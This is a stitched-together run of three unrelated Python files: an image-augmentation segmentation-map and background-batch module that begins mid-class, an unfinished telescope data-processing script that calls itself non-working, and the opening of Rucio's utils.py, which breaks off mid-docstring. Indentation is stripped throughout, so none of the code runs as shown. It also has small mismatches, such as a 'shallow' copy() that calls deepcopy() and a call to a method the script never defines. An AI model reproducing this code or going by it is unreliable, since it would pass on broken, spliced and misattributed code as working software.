DEFAULT_SEGMENT_COLORS = [
(0, 0, 0), # black
(230, 25, 75), # red
(60, 180, 75), # green
(255, 225, 25), # yellow
(0, 130, 200), # blue
(245, 130, 48), # orange
(145, 30, 180), # purple
(70, 240, 240), # cyan
(240, 50, 230), # magenta
(210, 245, 60), # lime
(250, 190, 190), # pink
(0, 128, 128), # teal
(230, 190, 255), # lavender
(170, 110, 40), # brown
(255, 250, 200), # beige
(128, 0, 0), # maroon
(170, 255, 195), # mint
(128, 128, 0), # olive
(255, 215, 180), # coral
(0, 0, 128), # navy
(128, 128, 128), # grey
(255, 255, 255), # white
# --
(115, 12, 37), # dark red
(30, 90, 37), # dark green
(127, 112, 12), # dark yellow
(0, 65, 100), # dark blue
(122, 65, 24), # dark orange
(72, 15, 90), # dark purple
(35, 120, 120), # dark cyan
(120, 25, 115), # dark magenta
(105, 122, 30), # dark lime
(125, 95, 95), # dark pink
(0, 64, 64), # dark teal
(115, 95, 127), # dark lavender
(85, 55, 20), # dark brown
(127, 125, 100), # dark beige
(64, 0, 0), # dark maroon
(85, 127, 97), # dark mint
(64, 64, 0), # dark olive
(127, 107, 90), # dark coral
(0, 0, 64), # dark navy
(64, 64, 64), # dark grey
]
def __init__(self, arr, shape, nb_classes=None):
if arr.dtype.type == np.bool_:  # np.bool_ is the scalar type of boolean ndarrays
assert arr.ndim in [2, 3]
self.input_was = ("bool", arr.ndim)
if arr.ndim == 2:
arr = arr[..., np.newaxis]
arr = arr.astype(np.float32)
elif arr.dtype.type in [np.uint8, np.uint32, np.int8, np.int16, np.int32]:
assert arr.ndim == 2 or (arr.ndim == 3 and arr.shape[2] == 1)
assert nb_classes is not None
assert nb_classes > 0
assert np.min(arr.flat[0:100]) >= 0
assert np.max(arr.flat[0:100]) <= nb_classes
self.input_was = ("int", arr.dtype.type, arr.ndim)
if arr.ndim == 3:
arr = arr[..., 0]
arr = np.eye(nb_classes)[arr] # from class indices to one hot
arr = arr.astype(np.float32)
elif arr.dtype.type in [np.float16, np.float32]:
assert arr.ndim == 3
self.input_was = ("float", arr.dtype.type, arr.ndim)
arr = arr.astype(np.float32)
else:
dt = str(arr.dtype) if is_np_array(arr) else "<no ndarray>"
raise Exception("Input was expected to be an ndarray of dtype bool, uint8, uint32 "
"int8, int16, int32 or float32. Got type %s with dtype %s." % (type(arr), dt))
assert arr.ndim == 3
assert arr.dtype.type == np.float32
self.arr = arr
self.shape = shape
self.nb_classes = nb_classes if nb_classes is not None else arr.shape[2]
#@property
#def nb_classes(self):
# return self.arr.shape[2]
def get_arr_int(self, background_threshold=0.01, background_class_id=0):
"""
Get the segmentation map array as an integer array of shape (H, W).
Each pixel in that array contains an integer value representing the pixel's class.
If multiple classes overlap, the one with the highest local float value is picked.
If that highest local value is below `background_threshold`, the method instead uses
the background class id as the pixel's class value.
Parameters
----------
background_threshold : float, optional(default=0.01)
At each pixel, each class-heatmap has a value between 0.0 and 1.0. If none of the
class-heatmaps has a value above this threshold, the method uses the background class
id instead.
background_class_id : int, optional(default=0)
Class id to fall back to if no class-heatmap passes the threshold at a spatial
location.
Returns
-------
result : (H,W) ndarray(int)
Segmentation map array.
"""
channelwise_max_idx = np.argmax(self.arr, axis=2)
result = channelwise_max_idx
if background_threshold is not None and background_threshold > 0:
probs = np.amax(self.arr, axis=2)
result[probs < background_threshold] = background_class_id
return result.astype(np.int32)
#def get_arr_bool(self, allow_overlapping=False, threshold=0.5, background_threshold=0.01, background_class_id=0):
# # TODO
# raise NotImplementedError()
def draw(self, size=None, background_threshold=0.01, background_class_id=0, colors=None, return_foreground_mask=False):
"""
Render the segmentation map as an RGB image.
Parameters
----------
size : None or float or iterable of two ints or iterable of two floats, optional(default=None)
Size of the rendered RGB image as (height, width).
See `imresize_single_image()` for details.
If set to None, no resizing is performed and the size of the segmentation map array is
used.
background_threshold : float, optional(default=0.01)
At each pixel, each class-heatmap has a value between 0.0 and 1.0. If none of the
class-heatmaps has a value above this threshold, the method uses the background class
id instead.
background_class_id : int, optional(default=0)
Class id to fall back to if no class-heatmap passes the threshold at a spatial
location.
colors : None or list of tuple of int, optional(default=None)
Colors to use. One for each class to draw. If None, then default colors will be used.
return_foreground_mask : bool, optional(default=False)
Whether to return a mask of the same size as the drawn segmentation map, containing
True at any spatial location that is not the background class and False everywhere
else.
Returns
-------
segmap_drawn : (H,W,3) ndarray(uint8)
Rendered segmentation map.
foreground_mask : (H,W) ndarray(bool)
Mask indicating the locations of foreground classes. Only returned if
return_foreground_mask is True.
"""
arr = self.get_arr_int(background_threshold=background_threshold, background_class_id=background_class_id)
nb_classes = self.nb_classes
segmap_drawn = np.zeros((arr.shape[0], arr.shape[1], 3), dtype=np.uint8)
if colors is None:
colors = SegmentationMapOnImage.DEFAULT_SEGMENT_COLORS
assert nb_classes <= len(colors), "Can't draw all %d classes as it would exceed the maximum number of %d available colors." % (nb_classes, len(colors),)
ids_in_map = np.unique(arr)
for c, color in zip(sm.xrange(1+nb_classes), colors):
if c in ids_in_map:
class_mask = (arr == c)
segmap_drawn[class_mask] = color
if return_foreground_mask:
foreground_mask = (arr != background_class_id)
else:
foreground_mask = None
if size is not None:
segmap_drawn = imresize_single_image(segmap_drawn, size, interpolation="nearest")
if foreground_mask is not None:
foreground_mask = imresize_single_image(foreground_mask.astype(np.uint8), size, interpolation="nearest") > 0
if foreground_mask is not None:
return segmap_drawn, foreground_mask
return segmap_drawn
def draw_on_image(self, image, alpha=0.5, resize="segmentation_map", background_threshold=0.01, background_class_id=0, colors=None, draw_background=False):
"""
Draw the segmentation map as an overlay over an image.
Parameters
----------
image : (H,W,3) ndarray(uint8)
Image onto which to draw the segmentation map.
alpha : float, optional(default=0.5)
Alpha/opacity value to use for the mixing of image and segmentation map.
Higher values mean that the segmentation map will be more visible and the image less
visible.
resize : "segmentation_map" or "image", optional(default="segmentation_map")
In case of size differences between the image and segmentation map, either the image or
the segmentation map can be resized. This parameter controls which of the two will be
resized to the other's size.
background_threshold : float, optional(default=0.01)
At each pixel, each class-heatmap has a value between 0.0 and 1.0. If none of the
class-heatmaps has a value above this threshold, the method uses the background class
id instead.
background_class_id : int, optional(default=0)
Class id to fall back to if no class-heatmap passes the threshold at a spatial
location.
colors : None or list of tuple of int, optional(default=None)
Colors to use. One for each class to draw. If None, then default colors will be used.
draw_background : bool, optional(default=False)
If True, the background will be drawn like any other class.
If False, the background will not be drawn, i.e. the respective background pixels
will be identical with the image's RGB color at the corresponding spatial location
and no color overlay will be applied.
Returns
-------
mix : (H,W,3) ndarray(uint8)
Rendered overlays.
"""
# assert RGB image
assert image.ndim == 3
assert image.shape[2] == 3
assert image.dtype.type == np.uint8
assert 0 - 1e-8 <= alpha <= 1.0 + 1e-8
assert resize in ["segmentation_map", "image"]
if resize == "image":
image = imresize_single_image(image, self.arr.shape[0:2], interpolation="cubic")
segmap_drawn, foreground_mask = self.draw(
background_threshold=background_threshold,
background_class_id=background_class_id,
size=image.shape[0:2] if resize == "segmentation_map" else None,
colors=colors,
return_foreground_mask=True
)
if draw_background:
mix = np.clip(
(1-alpha) * image + alpha * segmap_drawn,
0,
255
).astype(np.uint8)
else:
foreground_mask = foreground_mask[..., np.newaxis]
mix = np.zeros_like(image)
mix += (~foreground_mask).astype(np.uint8) * image
mix += foreground_mask.astype(np.uint8) * np.clip(
(1-alpha) * image + alpha * segmap_drawn,
0,
255
).astype(np.uint8)
return mix
def pad(self, top=0, right=0, bottom=0, left=0, mode="constant", cval=0.0):
"""
Pad the segmentation map on its top/right/bottom/left side.
Parameters
----------
top : int, optional(default=0)
Amount of pixels to add at the top side of the segmentation map. Must be 0 or
greater.
right : int, optional(default=0)
Amount of pixels to add at the right side of the segmentation map. Must be 0 or
greater.
bottom : int, optional(default=0)
Amount of pixels to add at the bottom side of the segmentation map. Must be 0 or
greater.
left : int, optional(default=0)
Amount of pixels to add at the left side of the segmentation map. Must be 0 or
greater.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
Returns
-------
result : SegmentationMapOnImage
Padded segmentation map of height H'=H+top+bottom and width W'=W+left+right.
"""
arr_padded = pad(self.arr, top=top, right=right, bottom=bottom, left=left, mode=mode, cval=cval)
return SegmentationMapOnImage(arr_padded, shape=self.shape)
def pad_to_aspect_ratio(self, aspect_ratio, mode="constant", cval=0.0, return_pad_amounts=False):
"""
Pad the segmentation map on its sides so that it matches a target aspect ratio.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
return_pad_amounts : bool, optional(default=False)
If False, then only the padded image will be returned. If True, a tuple with two
entries will be returned, where the first entry is the padded image and the second
entry are the amounts by which each image side was padded. These amounts are again a
tuple of the form (top, right, bottom, left), with each value being an integer.
Returns
-------
result : tuple
First tuple entry: Padded segmentation map as SegmentationMapOnImage object.
Second tuple entry: Amounts by which the segmentation map was padded on each side,
given as a tuple (top, right, bottom, left).
If return_pad_amounts is False, then only the segmentation map object is returned.
"""
arr_padded, pad_amounts = pad_to_aspect_ratio(self.arr, aspect_ratio=aspect_ratio, mode=mode, cval=cval, return_pad_amounts=True)
segmap = SegmentationMapOnImage(arr_padded, shape=self.shape)
if return_pad_amounts:
return segmap, pad_amounts
else:
return segmap
def scale(self, sizes, interpolation="cubic"):
"""
Rescale the segmentation map array to the provided size given the provided interpolation.
Parameters
----------
sizes : float or iterable of two ints or iterable of two floats
New size of the array in (height, width). See `imresize_single_image()` for details.
interpolation : None or string or int, optional(default="cubic")
The interpolation to use during resize. See `imresize_single_image()` for details.
Note: The segmentation map is internally stored as multiple float-based heatmaps,
making smooth interpolations potentially more reasonable than nearest neighbour
interpolation.
Returns
-------
result : SegmentationMapOnImage
Rescaled segmentation map object.
"""
arr_rescaled = imresize_single_image(self.arr, sizes, interpolation=interpolation)
# cubic interpolation can lead to values outside of [0.0, 1.0],
# see https://github.com/opencv/opencv/issues/7195
# TODO area interpolation too?
arr_rescaled = np.clip(arr_rescaled, 0.0, 1.0)
return SegmentationMapOnImage(arr_rescaled, shape=self.shape)
def to_heatmaps(self, only_nonempty=False, not_none_if_no_nonempty=False):
"""
Convert segmentation map to heatmaps object.
Each segmentation map class will be represented as a single heatmap channel.
Parameters
----------
only_nonempty : bool, optional(default=False)
If True, then only heatmaps for classes that appear in the segmentation map will be
generated. Additionally, a list of these class ids will be returned.
not_none_if_no_nonempty : bool, optional(default=False)
If `only_nonempty` is True and for a segmentation map no channel was non-empty,
this function usually returns None as the heatmaps object. If however this parameter
is set to True, a heatmaps object with one channel (representing class 0)
will be returned as a fallback in these cases.
Returns
-------
result : HeatmapsOnImage or None
Segmentation map as heatmaps.
If `only_nonempty` was set to True and no class appeared in the segmentation map,
then this is None.
class_indices : list of int
Class ids (0 to C-1) of the classes that were actually added to the heatmaps.
Only returned if `only_nonempty` was set to True.
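Examples
--------
A sketch of converting only the non-empty classes to heatmap channels
(array content is illustrative):
>>> import numpy as np
>>> segmap = SegmentationMapOnImage(np.int32([[0, 1], [1, 1]]), shape=(2, 2, 3), nb_classes=3)
>>> heatmaps, class_indices = segmap.to_heatmaps(only_nonempty=True)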
"""
if not only_nonempty:
return HeatmapsOnImage.from_0to1(self.arr, self.shape, min_value=0.0, max_value=1.0)
else:
nonempty_mask = np.sum(self.arr, axis=(0, 1)) > 0 + 1e-4
if np.sum(nonempty_mask) == 0:
if not_none_if_no_nonempty:
nonempty_mask[0] = True
else:
return None, []
class_indices = np.arange(self.arr.shape[2])[nonempty_mask]
channels = self.arr[..., class_indices]
return HeatmapsOnImage(channels, self.shape, min_value=0.0, max_value=1.0), class_indices
@staticmethod
def from_heatmaps(heatmaps, class_indices=None, nb_classes=None):
"""
Convert heatmaps to segmentation map.
Assumes that each class is represented as a single heatmap channel.
Parameters
----------
heatmaps : HeatmapsOnImage
Heatmaps to convert.
class_indices : None or list of int, optional(default=None)
List of class indices represented by each heatmap channel. See also the
secondary output of `to_heatmaps()`. If this is provided, it must have the same
length as the number of heatmap channels.
nb_classes : None or int, optional(default=None)
Number of classes. Must be provided if class_indices is set.
Returns
-------
result : SegmentationMapOnImage
Segmentation map derived from heatmaps.
"""
if class_indices is None:
return SegmentationMapOnImage(heatmaps.arr_0to1, shape=heatmaps.shape)
else:
assert nb_classes is not None
assert min(class_indices) >= 0
assert max(class_indices) < nb_classes
assert len(class_indices) == heatmaps.arr_0to1.shape[2]
arr_0to1 = heatmaps.arr_0to1
arr_0to1_full = np.zeros((arr_0to1.shape[0], arr_0to1.shape[1], nb_classes), dtype=np.float32)
#empty_channel = np.zeros((arr_0to1.shape[0], arr_0to1.shape[1]), dtype=np.float32)
class_indices_set = set(class_indices)
heatmap_channel = 0
for c in sm.xrange(nb_classes):
if c in class_indices_set:
arr_0to1_full[:, :, c] = arr_0to1[:, :, heatmap_channel]
heatmap_channel += 1
return SegmentationMapOnImage(arr_0to1_full, shape=heatmaps.shape)
def copy(self):
"""
Create a shallow copy of the segmentation map object.
Returns
-------
out : SegmentationMapOnImage
Shallow copy.
"""
return self.deepcopy()
def deepcopy(self):
"""
Create a deep copy of the segmentation map object.
Returns
-------
out : SegmentationMapOnImage
Deep copy.
"""
segmap = SegmentationMapOnImage(self.arr, shape=self.shape, nb_classes=self.nb_classes)
segmap.input_was = self.input_was
return segmap
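# A minimal round-trip sketch for to_heatmaps()/from_heatmaps() above. The 2x2
# class map, nb_classes=3 and the image shape are made-up example values, and the
# constructor is assumed to accept an integer class map plus nb_classes, as used
# in deepcopy() above. Wrapped in a helper so nothing runs on import.
def _example_segmap_heatmap_roundtrip():
    arr = np.int32([[0, 1],
                    [1, 2]])
    segmap = SegmentationMapOnImage(arr, shape=(2, 2, 3), nb_classes=3)
    # all three classes appear, so three heatmap channels (indices 0..2) come back
    heatmaps, class_indices = segmap.to_heatmaps(only_nonempty=True)
    # rebuild the segmentation map from the (possibly reduced) channel set
    return SegmentationMapOnImage.from_heatmaps(heatmaps, class_indices=class_indices, nb_classes=3)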
############################
# Background augmentation
############################
class Batch(object):
"""
Class encapsulating a batch before and after augmentation.
Parameters
----------
images : None or (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The images to augment.
images_gt : None or ndarray or list of ndarray, optional(default=None)
Ground truth images corresponding to `images`; when present, they are augmented alongside `images`.
mask_gt : None or ndarray or list of ndarray, optional(default=None)
Ground truth masks corresponding to `images`; when present, they are augmented alongside `images`.
keypoints : None or list of KeypointOnImage
The keypoints to augment.
data : anything
Additional data that is saved in the batch and may be read out
after augmentation. This could e.g. contain filepaths to each image
in `images`. As this object is usually used for background
augmentation with multiple processes, the augmented Batch objects might
not be returned in the original order, making this information useful.
"""
def __init__(self, images=None, images_gt=None, mask_gt=None, keypoints=None, data=None):
self.images = images
self.images_aug = None
self.images_gt = images_gt
self.images_gt_aug = None
self.mask_gt = mask_gt
self.mask_gt_aug = None
self.keypoints = keypoints
self.keypoints_aug = None
self.data = data
class BatchLoader(object):
"""
Class to load batches in the background.
Loaded batches can be accessed using `BatchLoader.queue`.
Parameters
----------
load_batch_func : callable
Function that yields Batch objects (i.e. expected to be a generator).
Background loading automatically stops when the last batch was yielded.
queue_size : int, optional(default=50)
Maximum number of batches to store in the queue. May be set higher
for small images and/or small batches.
nb_workers : int, optional(default=1)
Number of workers to run in the background.
threaded : bool, optional(default=True)
Whether to run the background processes using threads (true) or
full processes (false).
"""
def __init__(self, load_batch_func, queue_size=50, nb_workers=1, threaded=True):
do_assert(queue_size > 0)
do_assert(nb_workers >= 1)
self.queue = multiprocessing.Queue(queue_size)
self.join_signal = multiprocessing.Event()
self.finished_signals = []
self.workers = []
self.threaded = threaded
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
finished_signal = multiprocessing.Event()
self.finished_signals.append(finished_signal)
if threaded:
worker = threading.Thread(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, None))
else:
worker = multiprocessing.Process(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def all_finished(self):
"""
Determine whether the workers have finished the loading process.
Returns
-------
out : bool
True if all workers have finished. Else False.
"""
return all([event.is_set() for event in self.finished_signals])
def _load_batches(self, load_batch_func, queue, finished_signal, join_signal, seedval):
if seedval is not None:
random.seed(seedval)
np.random.seed(seedval)
seed(seedval)
try:
for batch in load_batch_func():
do_assert(isinstance(batch, Batch), "Expected batch returned by lambda function to be of class imgaug.Batch, got %s." % (type(batch),))
batch_pickled = pickle.dumps(batch, protocol=-1)
while not join_signal.is_set():
try:
queue.put(batch_pickled, timeout=0.001)
break
except QueueFull:
pass
if join_signal.is_set():
break
except Exception as exc:
traceback.print_exc()
finally:
finished_signal.set()
def terminate(self):
"""
Stop all workers.
"""
self.join_signal.set()
# give minimal time to put generated batches in queue and gracefully shut down
time.sleep(0.002)
# clean the queue, this reportedly prevents hanging threads
while True:
try:
self.queue.get(timeout=0.005)
except QueueEmpty:
break
if self.threaded:
for worker in self.workers:
worker.join()
# we don't have to set the finished_signals here, because threads always finish
# gracefully
else:
for worker in self.workers:
worker.terminate()
worker.join()
# wait here a tiny bit to really make sure that everything is killed before setting
# the finished_signals. calling set() and is_set() (via a subprocess) on them at the
# same time apparently results in a deadlock (at least in python 2).
#time.sleep(0.02)
for finished_signal in self.finished_signals:
finished_signal.set()
self.queue.close()
class BackgroundAugmenter(object):
"""
Class to augment batches in the background (while training on the GPU).
This is a wrapper around the multiprocessing module.
Parameters
----------
batch_loader : BatchLoader
BatchLoader object to load data in the
background.
augseq : Augmenter
An augmenter to apply to all loaded images.
This may be e.g. a Sequential to apply multiple augmenters.
queue_size : int
Size of the queue that is used to temporarily save the augmentation
results. Larger values offer the background processes more room
to save results when the main process doesn't load much, i.e. they
can lead to smoother and faster training. For large images, high
values can block a lot of RAM though.
nb_workers : "auto" or int
Number of background workers to spawn. If auto, it will be set
to C-1, where C is the number of CPU cores.
"""
def __init__(self, batch_loader, augseq, augseq_X=None, augseq_gt=None, queue_size=50, nb_workers="auto"):
do_assert(queue_size > 0)
self.augseq = augseq
self.augseq_X = augseq_X
self.augseq_gt = augseq_gt
self.source_finished_signals = batch_loader.finished_signals
self.queue_source = batch_loader.queue
self.queue_result = multiprocessing.Queue(queue_size)
if nb_workers == "auto":
try:
nb_workers = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
nb_workers = 1
# try to reserve at least one core for the main process
nb_workers = max(1, nb_workers - 1)
else:
do_assert(nb_workers >= 1)
#print("Starting %d background processes" % (nb_workers,))
self.nb_workers = nb_workers
self.workers = []
self.nb_workers_finished = 0
self.augment_images = True
self.augment_images_gt = True
self.augment_keypoints = True
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
worker = multiprocessing.Process(target=self._augment_images_worker, args=(augseq, augseq_X, augseq_gt, self.queue_source, self.queue_result, self.source_finished_signals, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def get_batch(self):
"""
Returns a batch from the queue of augmented batches.
If workers are still running and there are no batches in the queue,
it will automatically wait for the next batch.
Returns
-------
out : None or ia.Batch
One batch or None if all workers have finished.
"""
batch_str = self.queue_result.get()
batch = pickle.loads(batch_str)
if batch is not None:
return batch
else:
self.nb_workers_finished += 1
if self.nb_workers_finished == self.nb_workers:
return None
else:
return self.get_batch()
def _augment_images_worker(self, augseq, augseq_X, augseq_gt, queue_source, queue_result, source_finished_signals, seedval):
"""
Worker function that endlessly queries the source queue (input
batches), augments batches in it and sends the result to the output
queue.
"""
np.random.seed(seedval)
random.seed(seedval)
augseq.reseed(seedval)
if augseq_X:
augseq_X.reseed(seedval)
if augseq_gt:
augseq_gt.reseed(seedval)
seed(seedval)
while True:
# wait for a new batch in the source queue and load it
try:
batch_str = queue_source.get(timeout=0.1)
batch = pickle.loads(batch_str)
# augment the batch
batch_augment_images = batch.images is not None and self.augment_images
batch_augment_images_gt = batch.images_gt is not None and self.augment_images_gt
batch_augment_keypoints = batch.keypoints is not None and self.augment_keypoints
if batch_augment_images and batch_augment_keypoints:
augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
batch.images_aug = augseq_det.augment_images(batch.images)
batch.keypoints_aug = augseq_det.augment_keypoints(batch.keypoints)
elif batch_augment_images and batch_augment_images_gt:
augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
batch.images_aug = augseq_det.augment_images(batch.images)
batch.images_gt_aug = augseq_det.augment_images(batch.images_gt)
batch.mask_gt_aug = augseq_det.augment_images(batch.mask_gt)
if augseq_X:
batch.images_aug = augseq_X.augment_images(batch.images_aug)
if augseq_gt:
augseq_gt_det = augseq_gt.to_deterministic() if not augseq_gt.deterministic else augseq_gt
batch.images_gt_aug = augseq_gt_det.augment_images(batch.images_gt_aug)
batch.mask_gt_aug = augseq_gt_det.augment_images(batch.mask_gt_aug)
elif batch_augment_images:
batch.images_aug = augseq.augment_images(batch.images)
elif batch_augment_keypoints:
batch.keypoints_aug = augseq.augment_keypoints(batch.keypoints)
# send augmented batch to output queue
batch_str = pickle.dumps(batch, protocol=-1)
queue_result.put(batch_str)
except QueueEmpty:
if all([signal.is_set() for signal in source_finished_signals]):
queue_result.put(pickle.dumps(None, protocol=-1))
return
def terminate(self):
"""
Terminates all background processes immediately.
This will also free their RAM.
"""
for worker in self.workers:
worker.terminate()
self.queue_result.close()
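# A minimal usage sketch for the background augmentation pipeline above. `augseq`
# is assumed to be any Augmenter (e.g. a Sequential) and `images` a list of uint8
# ndarrays; both are supplied by the caller. Wrapped in a helper so nothing runs
# on import.
def _example_background_augmentation(augseq, images, batch_size=16):
    def load_batches():
        # yield Batch objects; BatchLoader stops once this generator is exhausted
        for i in range(0, len(images), batch_size):
            yield Batch(images=images[i:i + batch_size])
    batch_loader = BatchLoader(load_batches, nb_workers=1)
    bg_augmenter = BackgroundAugmenter(batch_loader, augseq, nb_workers=1)
    augmented = []
    while True:
        batch = bg_augmenter.get_batch()
        if batch is None:  # all augmentation workers have finished
            break
        augmented.append(batch.images_aug)
    # clean up queues and any remaining workers
    batch_loader.terminate()
    bg_augmenter.terminate()
    return augmented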
|
process_data.py
|
"""Script to periodically query and process new data. WIP not working yet!"""
import time
from queue import Queue
from threading import Thread
from datetime import datetime, timedelta
from huntsman.drp.datatable import RawDataTable
from huntsman.drp.butler import TemporaryButlerRepository
FILTER_NAMES = ["g_band", "r_band", "luminance"]
def query_latest_files(datatable, interval):
"""
Get latest filenames specified by a time interval.
Args:
datatable (`huntsman.drp.datatable.RawDataTable`): The raw data table.
interval (float): The time interval in seconds.
Returns:
list of filenames.
"""
time_now = datetime.utcnow()
time_start = time_now - timedelta(seconds=interval)
filenames = datatable.query_column("filename", date_start=time_start, date_end=time_now,
dataType="science")
return filenames
def process_data_async(queue, filter_names=FILTER_NAMES, make_coadd=False, rerun="dwfrerun"):
"""Get queued filename list and start processing it."""
while True:
# Get the next set of filenames
filenames = queue.get()
try:
# Create temp butler repo
with TemporaryButlerRepository() as butler_repository:
# Ingest raw data
butler_repository.ingest_raw_data(filenames)
# Make calexps
for filter_name in filter_names:
butler_repository.processCcd(dataType="science", rerun=rerun,
filter_name=filter_name)
# Assemble coadd
if make_coadd:
butler_repository.make_coadd(rerun=rerun)
except Exception as err:
print(f"Error processing files: {err}.")
finally:
queue.task_done()
if __name__ == "__main__":
# Factor these out as command line args
interval_seconds = 60
datatable = RawDataTable()
queue = Queue()
# Start the queue's worker thread
thread = Thread(target=process_data_async, daemon=False, args=(queue,))
thread.start()
while True:
# Get the latest filenames
filenames = datatable.query_latest(seconds=interval_seconds, column_name="filename")
# Queue the filenames for processing
print(f"Queuing {len(filenames)} files.")
queue.put(filenames)
# Wait for next batch
time.sleep(interval_seconds)
|
utils.py
|
# Copyright 2012-2019 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2020
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2019
# - Frank Berghaus, <frank.berghaus@cern.ch>, 2017
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister, <andrew.lister@stfc.ac.uk>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@gmail.com>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
#
# PY3K COMPATIBLE
from __future__ import print_function
import base64
import copy
import datetime
import errno
import getpass
import hashlib
import imp
import json
import os
import os.path
import re
import requests
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from six import string_types, text_type, PY3
from xml.etree import ElementTree
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException
from rucio.common.types import InternalAccount, InternalScope
# delay import until function to avoid circular dependency (note here for reference)
# from rucio.core.rse import get_rse_name
# Extra modules: Only imported if available
EXTRA_MODULES = {'web': False,
'paramiko': False,
'flask': False}
try:
from rucio.db.sqla.enum import EnumSymbol
EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
EXTRA_MODULES['rucio.db.sqla.enum'] = False
for extra_module in EXTRA_MODULES:
try:
imp.find_module(extra_module)
EXTRA_MODULES[extra_module] = True
except ImportError:
EXTRA_MODULES[extra_module] = False
if EXTRA_MODULES['web']:
from web import HTTPError
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
if EXTRA_MODULES['flask']:
from flask import Response
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
Utility function to build a URL for requests to the Rucio system.
If the optional parameter doseq evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
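# A short illustrative sketch of build_url(); the host is a placeholder.
def _example_build_url():
    # a plain dict is urlencoded: https://rucio.example.org/dids?name=foo
    simple = build_url('https://rucio.example.org', path='dids', params={'name': 'foo'})
    # with doseq=True a sequence value expands into repeated key=value pairs:
    # https://rucio.example.org/replicas?rse=RSE_A&rse=RSE_B
    expanded = build_url('https://rucio.example.org', path='replicas',
                         params={'rse': ['RSE_A', 'RSE_B']}, doseq=True)
    return simple, expanded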
def oidc_identity_string(sub, iss):
"""
Transform the IdP SUB claim and issuer URL into the user's identity string.
:param sub: user's SUB claim from the Identity Provider
:param iss: issuer (IdP) https url
:returns: OIDC identity string "SUB=<usersid>, ISS=https://iam-test.ch/"
"""
return 'SUB=' + str(sub) + ', ISS=' + str(iss)
def sqlalchemy_obj_to_dict(sqlalchemyresult):
"""
Makes dictionary from SQLAlchemy query result object
:param sqlalchemyresult:
:returns: dictionary
"""
res_dict = copy.deepcopy(dict(sqlalchemyresult.__dict__))
del res_dict['_sa_instance_state']
return res_dict
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
Returns False otherwise. audience and scope must both be strings
or both be lists; the same applies to the required_* variables.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
